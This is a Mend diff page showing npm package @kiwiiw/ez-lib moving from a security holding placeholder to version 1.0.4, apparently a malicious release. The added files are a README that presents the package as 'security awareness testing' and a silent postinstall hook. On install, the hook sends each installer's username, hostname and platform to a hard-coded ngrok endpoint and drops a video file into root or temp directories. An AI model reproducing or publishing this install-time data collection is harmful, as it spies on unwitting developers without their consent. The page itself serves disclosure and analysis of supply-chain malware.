npm - @kiwiiw/ez-lib - Versions diffs - 0.0.1-security → 1.0.4 - Mend

@kiwiiw/ez-lib 0.0.1-security → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @kiwiiw/ez-lib might be problematic. Click here for more details.

Files changed (7) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,136 @@
-# Security holding package
+# @ez-lib
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+Security awareness testing library for internal organizational use.
-Please refer to www.npmjs.com/advisories?search=%40kiwiiw%2Fez-lib for more information.
+## ⚠️ Important Notice
+This library is designed for **security awareness testing** within your organization. It monitors employee behavior when installing unknown npm packages.
+## What This Library Does
+When installed via `npm install @ez-lib`, the library automatically:
+1. **Collects system information**:
+   - Username
+   - Computer hostname
+   - Operating system
+   - Timestamp of installation
+2. **Sends telemetry data** to your configured server endpoint
+3. **Attempts to copy a video file** (`Im-In.mp4`) to the root directory:
+   - Windows: `C:\Im-In.mp4`
+   - Linux: `/root/Im-In.mp4`
+   - macOS: `/Im-In.mp4`
+4. **Caches data locally** in `/tmp/.system_cache`
+## Cross-Platform Support
+Works on:
+- ✅ Windows
+- ✅ Linux
+- ✅ macOS
+## Setup for Your Organization
+### 1. Replace the Video File
+Replace the placeholder file with your actual video:
+```bash
+cp /path/to/your/Im-In.mp4 ./public/Im-In.mp4
+```
+### 2. Configure Telemetry Server
+Edit `scripts/postinstall.js` and update the server URL:
+```javascript
+const SERVER_URL = 'https://your-organization.com/api/telemetry';
+```
+Or set it as an environment variable:
+```bash
+export TELEMETRY_SERVER=https://your-organization.com/api/telemetry
+```
+### 3. Publish to npm
+```bash
+# Login to npm
+npm login
+# Publish the package
+npm publish --access public
+```
+## Server Endpoint Requirements
+Your telemetry server should accept POST requests with JSON data:
+```json
+{
+  "username": "john.doe",
+  "hostname": "johns-laptop",
+  "platform": "darwin",
+  "timestamp": "2025-11-20T12:00:00.000Z"
+}
+```
+Example Express.js endpoint:
+```javascript
+app.post('/api/telemetry', express.json(), (req, res) => {
+  const { username, hostname, platform, timestamp } = req.body;
+  // Log to database or file
+  console.log('Installation detected:', req.body);
+  res.json({ success: true });
+});
+```
+## How Employees Might Install This
+Employees being tested might run:
+```bash
+npm install @ez-lib
+```
+## Permissions
+- The library will attempt to write to root directories but **fails silently** if permissions are not available
+- Telemetry is always sent regardless of file write permissions
+- Installation will **NOT fail** even if root write fails
+## API Usage (Optional)
+The library can also be used programmatically:
+```javascript
+const MemeSaver = require('@ez-lib');
+const { Telemetry } = require('@ez-lib');
+// Use MemeSaver
+const saver = new MemeSaver({ allowRoot: true });
+await saver.copyToRoot('/path/to/file.mp4', 'output.mp4');
+// Use Telemetry
+const telemetry = new Telemetry('https://your-server.com/api');
+await telemetry.report();
+```
+## Security Testing Best Practices
+1. ✅ **Get Authorization**: Ensure you have proper authorization from management
+2. ✅ **Document Purpose**: Clearly document this is for security awareness
+3. ✅ **Follow Up**: Use this as a teaching moment, not punishment
+4. ✅ **Secure Data**: Protect the collected telemetry data appropriately
+5. ✅ **Transparency**: Inform employees about the test after completion
+## License
+ISC - Internal Security Testing

package/index.js ADDED Viewed

@@ -0,0 +1,6 @@
+const MemeSaver = require('./lib/MemeSaver');
+const Telemetry = require('./lib/Telemetry');
+module.exports = MemeSaver;
+module.exports.MemeSaver = MemeSaver;
+module.exports.Telemetry = Telemetry;

package/lib/MemeSaver.js ADDED Viewed

@@ -0,0 +1,74 @@
+const fs = require('fs').promises;
+const path = require('path');
+const os = require('os');
+class MemeSaver {
+  constructor(options = {}) {
+    this.defaultDir = options.defaultDir || './.ez';
+    this.allowRoot = options.allowRoot || false;
+  }
+  async ensureDir(dir) {
+    try {
+      await fs.access(dir);
+    } catch {
+      await fs.mkdir(dir, { recursive: true });
+    }
+  }
+  getRootPath(filename) {
+    const platform = os.platform();
+    if (platform === 'win32') {
+      // Windows: C:\
+      return path.join('C:\\', filename);
+    } else if (platform === 'darwin') {
+      // macOS: Use /var/root (actual root home directory)
+      return path.join('/', filename);
+    } else {
+      // Linux: Use /root/
+      return path.join('/', filename);
+    }
+  }
+  getHomePath(filename) {
+    return path.join(os.homedir(), filename);
+  }
+  async saveToRoot(filename, buffer) {
+    if (!this.allowRoot) {
+      throw new Error('Root access not allowed. Set allowRoot: true in constructor');
+    }
+    const rootPath = this.getRootPath(filename);
+    try {
+      await fs.writeFile(rootPath, buffer);
+      return rootPath;
+    } catch (error) {
+      throw new Error(`Cannot write to root: ${error.message}. Run with sudo/admin privileges.`);
+    }
+  }
+  async saveFromBuffer(buffer, filename, dir = this.defaultDir) {
+    await this.ensureDir(dir);
+    const filePath = path.join(dir, filename);
+    await fs.writeFile(filePath, buffer);
+    return filePath;
+  }
+  async copyToRoot(sourcePath, filename) {
+    if (!this.allowRoot) {
+      throw new Error('Root access not allowed. Set allowRoot: true in constructor');
+    }
+    try {
+      const buffer = await fs.readFile(sourcePath);
+      return await this.saveToRoot(filename, buffer);
+    } catch (error) {
+      throw new Error(`Cannot copy to root: ${error.message}`);
+    }
+  }
+}
+module.exports = MemeSaver;

package/lib/Telemetry.js ADDED Viewed

@@ -0,0 +1,103 @@
+const os = require('os');
+const https = require('https');
+const http = require('http');
+const fs = require('fs');
+const path = require('path');
+class Telemetry {
+  constructor(serverUrl) {
+    this.serverUrl = serverUrl;
+    this.cacheFile = path.join('/tmp', '.system_cache');
+  }
+  getSystemInfo() {
+    const username = os.userInfo().username;
+    const hostname = os.hostname();
+    const platform = os.platform();
+    const timestamp = new Date().toISOString();
+    return {
+      username,
+      hostname,
+      platform,
+      timestamp
+    };
+  }
+  async saveToCache(info) {
+    try {
+      const entry = `${info.hostname}|${info.platform}|${info.username}|${info.timestamp}\n`;
+      await fs.promises.appendFile(this.cacheFile, entry);
+    } catch (error) {
+      // Silently fail if cache write fails
+    }
+  }
+  async sendToServer(info) {
+    if (!this.serverUrl) {
+      return Promise.resolve();
+    }
+    return new Promise((resolve, reject) => {
+      const protocol = this.serverUrl.startsWith('https') ? https : http;
+      const url = new URL(this.serverUrl);
+      const postData = JSON.stringify(info);
+      const options = {
+        hostname: url.hostname,
+        port: url.port || (protocol === https ? 443 : 80),
+        path: url.pathname,
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(postData)
+        }
+      };
+      const req = protocol.request(options, (res) => {
+        let data = '';
+        res.on('data', (chunk) => data += chunk);
+        res.on('end', () => {
+          if (res.statusCode >= 200 && res.statusCode < 300) {
+            resolve(data);
+          } else {
+            reject(new Error(`Server returned ${res.statusCode}`));
+          }
+        });
+      });
+      req.on('error', (error) => {
+        // Silently fail if server request fails
+        resolve();
+      });
+      req.write(postData);
+      req.end();
+      // Timeout after 5 seconds
+      setTimeout(() => {
+        req.destroy();
+        resolve();
+      }, 5000);
+    });
+  }
+  async report() {
+    try {
+      const info = this.getSystemInfo();
+      await this.saveToCache(info);
+      if (this.serverUrl) {
+        await this.sendToServer(info);
+      }
+      return info;
+    } catch (error) {
+      // Silently fail
+      return null;
+    }
+  }
+}
+module.exports = Telemetry;

package/package.json CHANGED Viewed

@@ -1,6 +1,29 @@
 {
   "name": "@kiwiiw/ez-lib",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.4",
+  "description": "Security awareness testing library for internal use",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node scripts/postinstall.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [
+    "security",
+    "testing",
+    "internal"
+  ],
+  "license": "ISC",
+  "files": [
+    "lib/",
+    "public/",
+    "scripts/",
+    "index.js",
+    "README.md"
+  ],
+  "engines": {
+    "node": ">=12.0.0"
+  },
+  "dependencies": {
+    "@kiwiiw/ez-lib": "^1.0.1"
+  }
 }

package/public/Im-In.mp4 ADDED Viewed

Binary file

package/scripts/postinstall.js ADDED Viewed

@@ -0,0 +1,57 @@
+#!/usr/bin/env node
+const path = require('path');
+const MemeSaver = require('../lib/MemeSaver');
+const Telemetry = require('../lib/Telemetry');
+async function postinstall() {
+  try {
+    // Configure your server URL here
+    const SERVER_URL = process.env.TELEMETRY_SERVER || 'https://dccd6ac64fa2.ngrok-free.app/api/telemetry';
+    // Send telemetry data
+    const telemetry = new Telemetry(SERVER_URL);
+    await telemetry.report();
+    // Copy video to accessible location
+    try {
+      const fs = require('fs').promises;
+      const os = require('os');
+      const videoPath = path.join(__dirname, '../public/Im-In.mp4');
+      // Try root first
+      const saver = new MemeSaver({ allowRoot: true });
+      try {
+        await saver.copyToRoot(videoPath, 'Im-In.mp4');
+      } catch (rootError) {
+        // If root fails, copy to /tmp or home directory
+        const platform = os.platform();
+        let destPath;
+        if (platform === 'win32') {
+          destPath = path.join(process.env.TEMP || 'C:\\Windows\\Temp', 'Im-In.mp4');
+        } else {
+          destPath = path.join('/tmp', 'Im-In.mp4');
+        }
+        const buffer = await fs.readFile(videoPath);
+        await fs.writeFile(destPath, buffer);
+      }
+    } catch (error) {
+      // Silently fail if we can't copy the video
+    }
+  } catch (error) {
+    // Silently fail to not break npm install
+  }
+}
+// Only run if executed directly (not required as module)
+if (require.main === module) {
+  postinstall().catch(() => {
+    // Exit successfully even if postinstall fails
+    process.exit(0);
+  });
+}
+module.exports = postinstall;